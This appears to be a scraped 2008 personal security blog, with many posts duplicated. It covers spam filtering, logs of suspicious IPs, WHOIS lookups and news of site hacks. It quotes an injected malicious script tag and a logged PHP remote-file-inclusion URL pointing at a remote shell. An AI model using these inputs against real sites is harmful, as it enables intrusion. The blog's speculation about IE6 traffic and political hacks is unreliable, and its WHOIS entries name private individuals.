4/30/2008 19:21 207.200.116.71
4/30/2008 16:27 208.70.118.237
4/30/2008 12:24 71.188.250.70
4/29/2008 12:55 4.242.9.82
4/29/2008 12:55 4.242.9.82
4/29/2008 11:55 67.170.95.168
4/29/2008 10:06 71.112.244.57
4/29/2008 10:04 71.112.244.57
4/27/2008 10:22 98.225.29.252
4/27/2008 7:31 24.18.228.135
4/26/2008 19:23 71.212.2.103
4/26/2008 19:01 70.125.156.68
4/26/2008 12:03 76.121.14.238
4/25/2008 14:24 146.129.247.2
4/25/2008 10:19 75.165.14.201
4/25/2008 2:55 199.117.2.58
4/24/2008 20:19 207.200.116.6
4/24/2008 20:19 207.200.116.6
4/24/2008 20:15 207.200.116.134
4/24/2008 20:15 207.200.116.134
4/24/2008 20:10 75.121.224.31
4/24/2008 16:07 65.160.238.180
4/24/2008 14:56 67.183.126.104
4/24/2008 14:24 67.183.126.104
4/22/2008 14:13 207.225.242.1
4/22/2008 10:01 64.122.250.13
4/21/2008 17:16 4.242.60.232
4/21/2008 16:50 4.242.60.232
4/21/2008 9:01 76.84.97.87
4/20/2008 19:49 24.18.132.106
4/20/2008 16:31 216.240.139.9
4/20/2008 9:00 24.113.218.28
4/20/2008 8:24 70.109.87.156
4/19/2008 9:29 67.101.1.198
4/19/2008 9:05 66.67.167.138
4/18/2008 12:16 68.55.80.153
4/18/2008 11:02 74.61.14.69
4/18/2008 8:36 216.220.163.131
4/17/2008 14:52 204.11.206.66
4/17/2008 10:54 72.160.81.9
4/17/2008 9:41 67.171.38.15
4/17/2008 7:54 70.145.72.210
4/16/2008 8:35 130.76.32.145
4/16/2008 1:08 76.22.98.254
4/15/2008 20:36 38.103.128.245
4/15/2008 11:33 63.229.10.210
4/15/2008 11:04 64.221.112.226
4/15/2008 8:11 150.70.84.27
4/14/2008 13:31 208.64.242.83
4/14/2008 10:52 38.103.128.245
4/14/2008 8:55 204.246.129.196
4/14/2008 8:17 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 7:03 150.70.84.154
4/13/2008 15:04 4.242.60.93
4/13/2008 15:00 4.242.60.93
4/13/2008 14:35 4.242.60.93
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/12/2008 16:25 75.172.87.114
4/12/2008 15:59 24.145.231.173
4/12/2008 15:26 71.249.87.226
4/12/2008 14:27 69.214.22.116
4/12/2008 12:33 207.43.224.70
4/12/2008 12:33 207.43.224.80
4/12/2008 9:57 150.70.84.27
4/12/2008 9:46 70.145.21.26
4/12/2008 9:28 74.242.96.197
4/12/2008 1:54 216.240.139.9
4/11/2008 23:57 65.101.141.82
4/11/2008 21:31 4.243.49.100
4/11/2008 8:30 67.170.85.124
4/10/2008 14:11 150.70.84.154
4/9/2008 20:26 71.127.254.195
4/9/2008 17:22 198.238.208.2
4/9/2008 15:51 199.233.178.253
4/9/2008 14:54 208.65.83.39
4/9/2008 13:44 67.183.164.154
4/9/2008 12:00 199.147.202.24
4/9/2008 11:49 199.147.202.24
4/9/2008 10:00 150.70.84.27
4/9/2008 8:41 216.20.149.124
Thursday, June 05, 2008
Email account hacked - Service Provider Corporation
My webmail company (finally someone did it) put a bar in my webmail that shows the last time someone logged in and from what IP address. I don't understand why ALL email companies do not do this. Bravo.
Anyway, that's when I found out that someone at this IP address had logged into my email account, and wasn't me:
166.129.232.106
OrgName: Service Provider Corporation
OrgID: SPC-10
Address: 442 Route 202-206 North
Address: # 485
City: Bedminster
StateProv: NJ
PostalCode: 07921-0523
Country: US
NetRange: 166.128.0.0 - 166.255.255.255
Anyway, that's when I found out that someone at this IP address had logged into my email account, and wasn't me:
166.129.232.106
OrgName: Service Provider Corporation
OrgID: SPC-10
Address: 442 Route 202-206 North
Address: # 485
City: Bedminster
StateProv: NJ
PostalCode: 07921-0523
Country: US
NetRange: 166.128.0.0 - 166.255.255.255
Identity Theft Prosecuted at Less than 1%
Watching Dateline show on identity theft, they report that only 1% of identity thefts are actually prosecuted. The problem, as suggested many times in this blog, these identity thefts are residing in other countries and local law enforcement has their hands tied in doing anything about it. This is an international crime and political issue, exacerbated further now that the identity theft rings have been reportedly moving into Iran where they believe they cannot be touched by the U.S. government. This is part of the money that is pouring out of the United States and into the bank accounts of thefts, criminals and possibly, foreign governments that may not have good intentions for the United States.
Recently, I met with an investor to catch up and ponder investment and business ideas, but after first hearing that my ideas were a conspiracy theory, even though many legitimate magazines, newspapers, television shows and a contact at the FBI have backed up my factual reports, I decided I was a bit too forward thinking and probably should go it alone for now (and he probably won't have invested anyway because I did not really go into detail about my plans and maybe he wouldn't have gotten it or maybe I am just clueless and my ideas will not amount to any money).
Just like the first spam filters were hated by people because maybe one or two good emails got caught, people don't get blocking out bad Internet traffic to save their businesses and prevent crime, hackers, spoofing, scraping and malware on their computers.
As far as stopping the crime altogether a wall only goes so far. Basically the world needs some big changes to catch and stop these crime rings, that perhaps are working hand in hand with drug lords and terrorists - since it has been reported that Internet crime is now more profitable than drugs. Laws need to change, and the International community, venture capitalists, and even the average user or at least the average business web site owner needs to catch up with reality and what needs to be done about these problems.
Recently, I met with an investor to catch up and ponder investment and business ideas, but after first hearing that my ideas were a conspiracy theory, even though many legitimate magazines, newspapers, television shows and a contact at the FBI have backed up my factual reports, I decided I was a bit too forward thinking and probably should go it alone for now (and he probably won't have invested anyway because I did not really go into detail about my plans and maybe he wouldn't have gotten it or maybe I am just clueless and my ideas will not amount to any money).
Just like the first spam filters were hated by people because maybe one or two good emails got caught, people don't get blocking out bad Internet traffic to save their businesses and prevent crime, hackers, spoofing, scraping and malware on their computers.
As far as stopping the crime altogether a wall only goes so far. Basically the world needs some big changes to catch and stop these crime rings, that perhaps are working hand in hand with drug lords and terrorists - since it has been reported that Internet crime is now more profitable than drugs. Laws need to change, and the International community, venture capitalists, and even the average user or at least the average business web site owner needs to catch up with reality and what needs to be done about these problems.
Saturday, May 10, 2008
winzipices.cn - check your site
A bunch of sites are infected with malware according to this article:
https://webmail.intermedia.net/services/go.php?url=http%3A%2F%2Fwww.networkworld.com%2Fnews%2F2008%2F050708-web-attack-worm-infecting-hapless.html%3Fnlhtsec%3Drn_050908%26nladname%3D050908securityal
You can see sites that are infected by simply searching on "winzipices.cn" in Google but do NOT go to those web sites or your computer will be affected as described in the article.
You can see if your own site is infected by typing into goole: "site:[yourdomain.com] winzipices.cn".
Google in the past has put warnings on infected sites - hopefully they will do so with all of these soon.
https://webmail.intermedia.net/services/go.php?url=http%3A%2F%2Fwww.networkworld.com%2Fnews%2F2008%2F050708-web-attack-worm-infecting-hapless.html%3Fnlhtsec%3Drn_050908%26nladname%3D050908securityal
You can see sites that are infected by simply searching on "winzipices.cn" in Google but do NOT go to those web sites or your computer will be affected as described in the article.
You can see if your own site is infected by typing into goole: "site:[yourdomain.com] winzipices.cn".
Google in the past has put warnings on infected sites - hopefully they will do so with all of these soon.
Sunday, May 04, 2008
How to Eliminate A Lot More Spam
Here's how you can eliminate a large percentage of the spam you are still getting:
#1 Get Postini - I got the $12/yr security service that allows the following configurations.
#2 On your inbound server configuration in Postini - if you mainly only communicate the US block out entire blocks of IPs in other countries you do not need where a lot of spam orginiates such as (you may want to block more or less depending on your communication patterns):
41.0.0.0-41.255.255.255
77.0.0.0-89.255.255.255
189.0.0.0-202.255.255.255
58.0.0.0-62.255.255.255
192.0.0.0-192.255.255.255
125.0.0.0-125.255.255.255
#3. If there's a particular person you do need to communicate with in these countries add them to your white list so they don't get blocked by the above.
#4. When you set up Postini you will change your MX records and then you will realize there's a lot of spam getting inserted directly into your mail server that is not even using your MX records. All this spam can be prevented by changing the firewall rules for your mail server to only accept mail from Postini IP addresses.
#5. You may want to only accept messages from mail hosts that support TLS because any legitimate mail provider will support this. Any hacked mail servers that are some admin throwing mail server software on a machine out of the box without setting it up properly to prevent relay - might not have have TLS running. TLS will also secure your messages in transit which is the real purpose. If someone claims they cannot send to you because they are not using a mail server that supports TLS - tell them to get a new mail provider.
#6. If any other spam squeaks through, look at the mail header to get the ORIGINATING IP address and block it out at Postini and you won't get mail from that possibly hacked email provider any longer.
#1 Get Postini - I got the $12/yr security service that allows the following configurations.
#2 On your inbound server configuration in Postini - if you mainly only communicate the US block out entire blocks of IPs in other countries you do not need where a lot of spam orginiates such as (you may want to block more or less depending on your communication patterns):
41.0.0.0-41.255.255.255
77.0.0.0-89.255.255.255
189.0.0.0-202.255.255.255
58.0.0.0-62.255.255.255
192.0.0.0-192.255.255.255
125.0.0.0-125.255.255.255
#3. If there's a particular person you do need to communicate with in these countries add them to your white list so they don't get blocked by the above.
#4. When you set up Postini you will change your MX records and then you will realize there's a lot of spam getting inserted directly into your mail server that is not even using your MX records. All this spam can be prevented by changing the firewall rules for your mail server to only accept mail from Postini IP addresses.
#5. You may want to only accept messages from mail hosts that support TLS because any legitimate mail provider will support this. Any hacked mail servers that are some admin throwing mail server software on a machine out of the box without setting it up properly to prevent relay - might not have have TLS running. TLS will also secure your messages in transit which is the real purpose. If someone claims they cannot send to you because they are not using a mail server that supports TLS - tell them to get a new mail provider.
#6. If any other spam squeaks through, look at the mail header to get the ORIGINATING IP address and block it out at Postini and you won't get mail from that possibly hacked email provider any longer.
Friday, April 25, 2008
Obama and Clinton Sites Hacked - Among Others
Obama and Clinton had their web sites hacked according to netcraft report: Obama Clinton site hacks Hmm. Obama's primary site was hacked. Clinton's was not. Clinton is raising a lot of money suddenly. Coincidence?
Check your web site security. It matters.
Oh and by the way the UN site was hacked too (among others):
UN Web site Hacked
Check your web site security. It matters.
Oh and by the way the UN site was hacked too (among others):
UN Web site Hacked
Patch or Be Hacked in 30 Seconds
This is why you should install patches sooner than later:
Microsoft Vulnerabilities Hacked in 30 seconds
Microsoft Vulnerabilities Hacked in 30 seconds
Iframe Hack
Here's how to check if your site is one of the many with the latest iframe hack:
Search all your web pages for code like this and remove it:
<script src=http://www.nihaorr1.com/1.js>
More info:
Iframe hack
Search all your web pages for code like this and remove it:
<script src=http://www.nihaorr1.com/1.js>
More info:
Iframe hack
Keyword Spy
These people are probably dissecting your web content to copy and put onto their own web sites.
66.34.204.26
The referrer is always something like:
http://www.keywordspy.com/...
You may want to block them.
Contact the network and ask them to stop.
C I Host CIHOST4 (NET-66-34-0-0-1)
66.34.0.0 - 66.34.255.255
CIHS PROPAGATION4 (NET-66-34-0-0-2)
66.34.0.0 - 66.34.255.254
If this is not illegal, it should be.
66.34.204.26
The referrer is always something like:
http://www.keywordspy.com/...
You may want to block them.
Contact the network and ask them to stop.
C I Host CIHOST4 (NET-66-34-0-0-1)
66.34.0.0 - 66.34.255.255
CIHS PROPAGATION4 (NET-66-34-0-0-2)
66.34.0.0 - 66.34.255.254
If this is not illegal, it should be.
Friday, April 18, 2008
Bots Scanning Google Hacking Tons of Web Sites
See my post about IE6 scanning Google links in a recent post:
http://www.networkworld.com/news/2008/041708-sans-solves-mystery-of-mass.html?Inform=nl&nlhtsec=rn_041808&nladname=041808securityal
The results of scans and hacking was reported back to a computer in China.
Update your software!
http://www.networkworld.com/news/2008/041708-sans-solves-mystery-of-mass.html?Inform=nl&nlhtsec=rn_041808&nladname=041808securityal
The results of scans and hacking was reported back to a computer in China.
Update your software!
Friday, April 11, 2008
Postini - Spam is Down
Using Postini spam has decreased from about 900 messages per day to 19 yesterday. 19 is still too many but it's getting better...
Tuesday, April 08, 2008
Postini Test
Testing out Postini and gave them a day to catch up. I've been sending all my spam and full mail headers to spam@postini.com as recommended on the contact page of their web site. Here are the statistics so far.
Today Postini caught about 33 spam messages.
I sent them about 61 messages that their spam filters did not catch.
That being said I just recently added some spam ridden aliases to their spam configuration (which is pretty decent though it could be a bit more user friendly and easy to find what you are looking for...)
Also I found a bunch of spam -- in my SENT items - which were sent to me on the Intermedia mail system which I think is based on Horde. Some of those may have been pretty old.
As I write this I just logged in to find two more spam messages in my in box.
We'll see how they do tomorrow...
Today Postini caught about 33 spam messages.
I sent them about 61 messages that their spam filters did not catch.
That being said I just recently added some spam ridden aliases to their spam configuration (which is pretty decent though it could be a bit more user friendly and easy to find what you are looking for...)
Also I found a bunch of spam -- in my SENT items - which were sent to me on the Intermedia mail system which I think is based on Horde. Some of those may have been pretty old.
As I write this I just logged in to find two more spam messages in my in box.
We'll see how they do tomorrow...
Sunday, April 06, 2008
Email Server Check
Here's a cool site which helps you test your MX records to first of all find out what they are, and then test diagnostics such as if your mail server is an open relay - very bad - on blacklists - also not good, or not performing well.
http://www.mxtoolbox.com/
For instance this site shows that intermedia.net has an smtp server that is potentially an open relay and responding very slowly.
Two electricmail.com servers return slowly and the second one has a reverse dns problem.
Check your mail servers by putting in your domain name, then run the diagnostic and blacklist test and ask your mail providers to fix any problems they find.
http://www.mxtoolbox.com/
For instance this site shows that intermedia.net has an smtp server that is potentially an open relay and responding very slowly.
Two electricmail.com servers return slowly and the second one has a reverse dns problem.
Check your mail servers by putting in your domain name, then run the diagnostic and blacklist test and ask your mail providers to fix any problems they find.
Monday, March 31, 2008
Further Convinced IE6 is used for maliciousness
I am further convinced that users of IE6 or their computers are up to no good and that at least a part of your IE6 traffic is bogus and used for purposes other than for people to learn about and buy your products and services.
Not only do most IE6 users in general not upgrade their browser after being locked out of the site which was done as a test to see if this traffic is legit - most of the traffic is a one-off hit and not by users of these sites who are typically frequent visitors looking for updated information. Long time legitimate users are not typically the ones using IE6 - it is the random one-off visitor hitting odd sites that it is very strange they would be trafficking in the first place.
For instance, there's an IP in Brazil - a known big source of spam - hitting a site over and over again with different browsers probably trying to decipher how to crack through this blocking. They are looking at a site with Christmas related items. It is doubtful that at this time of year someone in Brazil is trying that hard to view Christmas decorations in the US that are not even for sale online.
As a side note a lot of people from Brazil travel to a location related to a travel booking site we run - could this be a travel agent or criminal in Brazil trying to copy the site and direct traffic to them instead of us?
Here's the IP: 201.77.3.1
inetnum: 201.77.0/20
aut-num: AS28650
abuse-c: RFS185
owner: Dilmar Antonio Simonetti
ownerid: 031.743.818/0001-28
responsible: Dilmar Simonetti
owner-c: RFS185
tech-c: RFS185
inetrev: 201.77.0/21
nserver: ns.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
nserver: ns2.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
created: 20060607
changed: 20060607
nic-hdl-br: RFS185
person: Rogerio Ferreira dos Santos
e-mail: roger@simonet.com.br
created: 20010816
changed: 20060307
Not only do most IE6 users in general not upgrade their browser after being locked out of the site which was done as a test to see if this traffic is legit - most of the traffic is a one-off hit and not by users of these sites who are typically frequent visitors looking for updated information. Long time legitimate users are not typically the ones using IE6 - it is the random one-off visitor hitting odd sites that it is very strange they would be trafficking in the first place.
For instance, there's an IP in Brazil - a known big source of spam - hitting a site over and over again with different browsers probably trying to decipher how to crack through this blocking. They are looking at a site with Christmas related items. It is doubtful that at this time of year someone in Brazil is trying that hard to view Christmas decorations in the US that are not even for sale online.
As a side note a lot of people from Brazil travel to a location related to a travel booking site we run - could this be a travel agent or criminal in Brazil trying to copy the site and direct traffic to them instead of us?
Here's the IP: 201.77.3.1
inetnum: 201.77.0/20
aut-num: AS28650
abuse-c: RFS185
owner: Dilmar Antonio Simonetti
ownerid: 031.743.818/0001-28
responsible: Dilmar Simonetti
owner-c: RFS185
tech-c: RFS185
inetrev: 201.77.0/21
nserver: ns.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
nserver: ns2.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
created: 20060607
changed: 20060607
nic-hdl-br: RFS185
person: Rogerio Ferreira dos Santos
e-mail: roger@simonet.com.br
created: 20010816
changed: 20060307
Saturday, March 29, 2008
Google Gets Into Security Outsourcing
This is very interesting and I like it, for the most part, because I think a company with lots of money will need to do this to really be effective:
Google bought Postini and is offering small businesses a way to "outsource" their security. Now, there are many aspects of security and this does not exactly cover the things I mentioned in my last post. That's a different animal. The portion of security in this case is scanning emails before they get to you and web site responses before they get to you.
Outsourced Security
The thing about Google, is that they have a lot of really smart people and money. And I have a feeling Google might have a little bit of a bent to help make the world a better place. The way Google can really help would be to consolidate anonymous access of all this data coming from bots and hacked computers, spammers, scammers and criminals, and use it to prosecute the offenders.
This is not an easy task as many criminals are outside the US or perhaps inside the US doing their dirty work through people outside the US or perhaps outside the US masquerading as people inside the US. Anything crossing international borders is going to be tricky and probably involve some politicians.
And in general, tackling this big problem is going to cost a lot of money to stay on top of the analysis to do this thing right - and really stay ahead of the hackers - who are some really smart brains whose day is spent 100% trying to figure out how to crack your password, hack your system, steal the money in your bank account, divert your business to themselevs, etc.
There is one thing about this solution that bothers me however. If Google sets up a bunch of proxy servers for small businesses - are they going to pass through legitimate information about the person making a request on your web site? Or will all the requests look like they are coming from Google? That gives Google a strangle hold on a lot of marketing people which is not a good idea. It also sets up the service to work like AOL which a haven for hackers and criminals who want to hide their identity. That is my only concern so far about this service, which is otherwise great.
Google bought Postini and is offering small businesses a way to "outsource" their security. Now, there are many aspects of security and this does not exactly cover the things I mentioned in my last post. That's a different animal. The portion of security in this case is scanning emails before they get to you and web site responses before they get to you.
Outsourced Security
The thing about Google, is that they have a lot of really smart people and money. And I have a feeling Google might have a little bit of a bent to help make the world a better place. The way Google can really help would be to consolidate anonymous access of all this data coming from bots and hacked computers, spammers, scammers and criminals, and use it to prosecute the offenders.
This is not an easy task as many criminals are outside the US or perhaps inside the US doing their dirty work through people outside the US or perhaps outside the US masquerading as people inside the US. Anything crossing international borders is going to be tricky and probably involve some politicians.
And in general, tackling this big problem is going to cost a lot of money to stay on top of the analysis to do this thing right - and really stay ahead of the hackers - who are some really smart brains whose day is spent 100% trying to figure out how to crack your password, hack your system, steal the money in your bank account, divert your business to themselevs, etc.
There is one thing about this solution that bothers me however. If Google sets up a bunch of proxy servers for small businesses - are they going to pass through legitimate information about the person making a request on your web site? Or will all the requests look like they are coming from Google? That gives Google a strangle hold on a lot of marketing people which is not a good idea. It also sets up the service to work like AOL which a haven for hackers and criminals who want to hide their identity. That is my only concern so far about this service, which is otherwise great.
The Cost of Cheap Web Sites
Ok so you figured it out and you threw your cheap PHP site online and you think you're cool right? But if you're not monitoring you site carefully and updating to get all the latest patches - constantly - you may be aiding and abetting hackers, phishers and spammers.
http://www.networkworld.com/news/2008/032808-google-search-behind-most-phishing.html
If you don't know what you're doing - use a system from a company that has security built in and handles all the hosting and security for you - man in the middle, sql injection, cross site scripting, bot traffic filtering, code injection, OS updates, web platform updates and constant monitoring of security issues - and help make the world a better place. There are places you can get "cheap" web sites if you really want one without creating these problems for the rest of the world.
The problem is really that all these people who go out and get cheap and free web sites and don't know what they are doing created headaches for the rest of the world - who foots the bill when their web site gets hacked and is used for malicious purposes.
http://www.networkworld.com/news/2008/032808-google-search-behind-most-phishing.html
If you don't know what you're doing - use a system from a company that has security built in and handles all the hosting and security for you - man in the middle, sql injection, cross site scripting, bot traffic filtering, code injection, OS updates, web platform updates and constant monitoring of security issues - and help make the world a better place. There are places you can get "cheap" web sites if you really want one without creating these problems for the rest of the world.
The problem is really that all these people who go out and get cheap and free web sites and don't know what they are doing created headaches for the rest of the world - who foots the bill when their web site gets hacked and is used for malicious purposes.
IE6 - Fake Traffic or Surrogate Traffic
This is a prediction which I cannot exactly prove yet, but I am guessing something like this might be going on - and perhaps this is old news because I don't know every security vulnerability that exists for IE6.
My guess is that much of your traffic coming to your web server from IE6 may in fact not be traffic from the person who owns that computer or server. I am guessing that much of the IE6 traffic you see in your logs is a third party who has hijacked that machine, browser, or maybe a session or whatever to hide their true identity while sniffing around for security problems, hijacking your web site content, or possibly blocking search engines from getting to your site to hurt your rankings...not sure but there's something really weird about all the IE6 traffic on my server.
And even more odd is that when this traffic is blocked with a request to upgrade the browser, the user of that machine doesn't upgrade. I find it hard to believe that with all the security hype and fear of stolen identity and access to bank accounts that these users refuse to upgrade their browser. I think maybe these are old machines sitting around that have a browser on them that isn't even used, perhaps, and some hacker has gotten onto it and uses it to hide the true source of the traffic.
My guess is that much of your traffic coming to your web server from IE6 may in fact not be traffic from the person who owns that computer or server. I am guessing that much of the IE6 traffic you see in your logs is a third party who has hijacked that machine, browser, or maybe a session or whatever to hide their true identity while sniffing around for security problems, hijacking your web site content, or possibly blocking search engines from getting to your site to hurt your rankings...not sure but there's something really weird about all the IE6 traffic on my server.
And even more odd is that when this traffic is blocked with a request to upgrade the browser, the user of that machine doesn't upgrade. I find it hard to believe that with all the security hype and fear of stolen identity and access to bank accounts that these users refuse to upgrade their browser. I think maybe these are old machines sitting around that have a browser on them that isn't even used, perhaps, and some hacker has gotten onto it and uses it to hide the true source of the traffic.
Friday, March 28, 2008
PHP hack - shell - 216.191.16.12
IP address 82.210.107.191 is attempting get to one of our urls with a url that ends in a php page like this:
main.php?pageURL=http://216.191.16.12/.shell/site/iyes.txt??
Apparently there is another PHP hack on the loose.
main.php?pageURL=http://216.191.16.12/.shell/site/iyes.txt??
Apparently there is another PHP hack on the loose.
Thursday, March 27, 2008
Supsicious and possibly related IPs
I think at least some of these computers have something in common - like they are hacked or run by hackers. In particular the IP address 96.10.27.184 is clearly trying to alter the user agent in their request. I am pretty sure some of the others are doing the same. A few of them may be people who just need to update their browsers to the latest version.
Another interesting thing is that most of these visits were referred by Google for whatever that is worth.
3/27/2008 17:05 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:00 206.28.72.1
3/27/2008 16:23 75.165.40.66
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:00 75.213.19.243
3/27/2008 15:33 208.152.32.185
3/27/2008 15:33 208.152.32.185
3/27/2008 15:32 96.10.27.184
3/27/2008 15:25 206.188.43.45
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:21 65.122.125.226
3/27/2008 15:21 65.122.125.226
3/27/2008 15:20 199.245.127.5
3/27/2008 15:20 65.122.125.226
3/27/2008 15:20 65.122.125.226
3/27/2008 15:19 199.245.127.5
3/27/2008 15:16 208.100.138.5
3/27/2008 15:15 69.88.119.126
3/27/2008 15:15 69.88.119.126
3/27/2008 15:14 69.88.119.126
3/27/2008 15:07 68.178.99.210
3/27/2008 14:50 65.101.142.202
3/27/2008 14:50 96.10.27.184
3/27/2008 14:48 65.101.142.202
3/27/2008 14:48 65.101.142.202
3/27/2008 14:47 65.101.142.202
Another interesting thing is that most of these visits were referred by Google for whatever that is worth.
3/27/2008 17:05 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:00 206.28.72.1
3/27/2008 16:23 75.165.40.66
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:00 75.213.19.243
3/27/2008 15:33 208.152.32.185
3/27/2008 15:33 208.152.32.185
3/27/2008 15:32 96.10.27.184
3/27/2008 15:25 206.188.43.45
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:21 65.122.125.226
3/27/2008 15:21 65.122.125.226
3/27/2008 15:20 199.245.127.5
3/27/2008 15:20 65.122.125.226
3/27/2008 15:20 65.122.125.226
3/27/2008 15:19 199.245.127.5
3/27/2008 15:16 208.100.138.5
3/27/2008 15:15 69.88.119.126
3/27/2008 15:15 69.88.119.126
3/27/2008 15:14 69.88.119.126
3/27/2008 15:07 68.178.99.210
3/27/2008 14:50 65.101.142.202
3/27/2008 14:50 96.10.27.184
3/27/2008 14:48 65.101.142.202
3/27/2008 14:48 65.101.142.202
3/27/2008 14:47 65.101.142.202
Wednesday, March 26, 2008
Offshore Fraud Alerts
Watching American Greed on CNBC and listening to all the scams people fall for (if it's too good to be true...it probably is) and learned about this web site Offshore Alert which has information on various offshore scams.
Sunday, March 23, 2008
IP Range lists Two Country Codes
This IP range list two country codes - Belgium and The Netherlands
inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL
inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL
IP Range lists two country codes
This IP range lists two countries - Belgium and The Netherlands:
inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL
inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL
Saturday, March 22, 2008
Do you know where your email address is listed?
Go to Google and type in your email address.
If you don't like where it's listed, report it to Google and the web site owner to try to get it removed.
Good luck.
Many news groups publish people's names and email addresses on web sites - and not only that they publish these news groups get copied to all kinds of third party sites - so your name and email address is spread all over search engine results.
This makes it extremely easy for hackers and spammers who scan web pages to pick up your email address all over the place.
One site changed all the email addresses to something like this name <at> emailaddress.com
That doesn't really hide the address.
Try to contact these web sites and ask them to remove your name and email address. Some of them will do it. After many contacts some web sites still have not responded and other web sites have said they will remove the pages but it takes forever for them to remove it and even longer for it to be removed from search engine caches so it doesn't show up in search engine listings.
Should it be legal to post someone's private contact information without consent?
If you don't like where it's listed, report it to Google and the web site owner to try to get it removed.
Good luck.
Many news groups publish people's names and email addresses on web sites - and not only that they publish these news groups get copied to all kinds of third party sites - so your name and email address is spread all over search engine results.
This makes it extremely easy for hackers and spammers who scan web pages to pick up your email address all over the place.
One site changed all the email addresses to something like this name <at> emailaddress.com
That doesn't really hide the address.
Try to contact these web sites and ask them to remove your name and email address. Some of them will do it. After many contacts some web sites still have not responded and other web sites have said they will remove the pages but it takes forever for them to remove it and even longer for it to be removed from search engine caches so it doesn't show up in search engine listings.
Should it be legal to post someone's private contact information without consent?
Sunday, March 16, 2008
Code Injected Into Trend Micro Web Site
Trend Micro has some security software among other things so it is ironic that their web site was the victim of a code injection attack which apparently sent people to some evil sites in China. This reinforces that web site hacks are more prevalent than most companies realize or admit: Trend Micro Web Site Hacked
Hack - quoted identifies - SQL 2000
Depending on how sql identifiers are set in sql 2000, certain SQL injection hacks related to what is explained here may be a problem:
http://www.sqlteam.com/article/quoted-identifiers-in-sql-server-2000
http://www.sqlteam.com/article/quoted-identifiers-in-sql-server-2000
Apnic IP reports US address
This IP Range should be moved to Arin or fixed to indicate the correct location:
Inetnum: 203.187.128.0 - 203.187.159.255
netname: INFONET-AP-02
descr: BT-Infonet, Internet Service Provider
descr: 2160 E. Grand Ave. El Segundo, CA90245
country: US
Inetnum: 203.187.128.0 - 203.187.159.255
netname: INFONET-AP-02
descr: BT-Infonet, Internet Service Provider
descr: 2160 E. Grand Ave. El Segundo, CA90245
country: US
Spam Viruses on the Rise
Google reports that Spam Viruses are on the rise in this report from eweek:
Spam Viruses on the Rise
And on that note I must say my mailbox is even more full of spam messages with attachments and the particularly spammed mailbox is on a bunch of social networking and job related web sites and a few user group mailing lists, and of course mailing lists like eweek and other Internet industry mailing lists.
Other than that I barely use that email address for communication anymore due to all the problems.
So is all this spam the result of putting my name on some social networking site somewhere?
As a matter of fact I tried out Facebook for a while just to see what all the hubbub was about and I got sent so many of these stupid applications and postings from friends that I just did not believe were legitimately from my friends. I would see that two random and unrelated people were challenged to a game, for instance or received a similar post and I started to wonder if some of those things were fake. I'm sure they were, but basically I never clicked on any of them (sorry all you facebook friends out there) because I know that these apps from random sites could contain things that are harmful to my computer and who knows what is in them or where they came from...and even the ones I did sign up for from bigger name software makers I wondered about.
So yeah, I really believe this and I wonder if the makers of some of the executive type social networking sites are actually using that information illegally - or those systems are getting hacked for that purpose, which is why in part I do not fully use them.
Spam Viruses on the Rise
And on that note I must say my mailbox is even more full of spam messages with attachments and the particularly spammed mailbox is on a bunch of social networking and job related web sites and a few user group mailing lists, and of course mailing lists like eweek and other Internet industry mailing lists.
Other than that I barely use that email address for communication anymore due to all the problems.
So is all this spam the result of putting my name on some social networking site somewhere?
As a matter of fact I tried out Facebook for a while just to see what all the hubbub was about and I got sent so many of these stupid applications and postings from friends that I just did not believe were legitimately from my friends. I would see that two random and unrelated people were challenged to a game, for instance or received a similar post and I started to wonder if some of those things were fake. I'm sure they were, but basically I never clicked on any of them (sorry all you facebook friends out there) because I know that these apps from random sites could contain things that are harmful to my computer and who knows what is in them or where they came from...and even the ones I did sign up for from bigger name software makers I wondered about.
So yeah, I really believe this and I wonder if the makers of some of the executive type social networking sites are actually using that information illegally - or those systems are getting hacked for that purpose, which is why in part I do not fully use them.
Wednesday, March 12, 2008
Top 10 Web Vulnerabilities - Q4 2007
Report of top 10 web vulnerabilities - Q4 2007 states that 29% of vulernabilities are attributable to network and infrastructure, while 71% are attributable to both open source and commercial web applications.
PHP represents 30% of all vulnerabilities. Ahem. I have mentioned this before and I still think PHP is a majorly hacked platform because people think it is "easy and cheap" and well, yes, until you get hacked. That's not to say PHP cannot be secure. It's just that the relative ease of tacking together an application that can be blown over in the wind makes it attractive for use by people who want to think they are programmers without understanding the underlying fundamentals of programming, software, web applications or security.
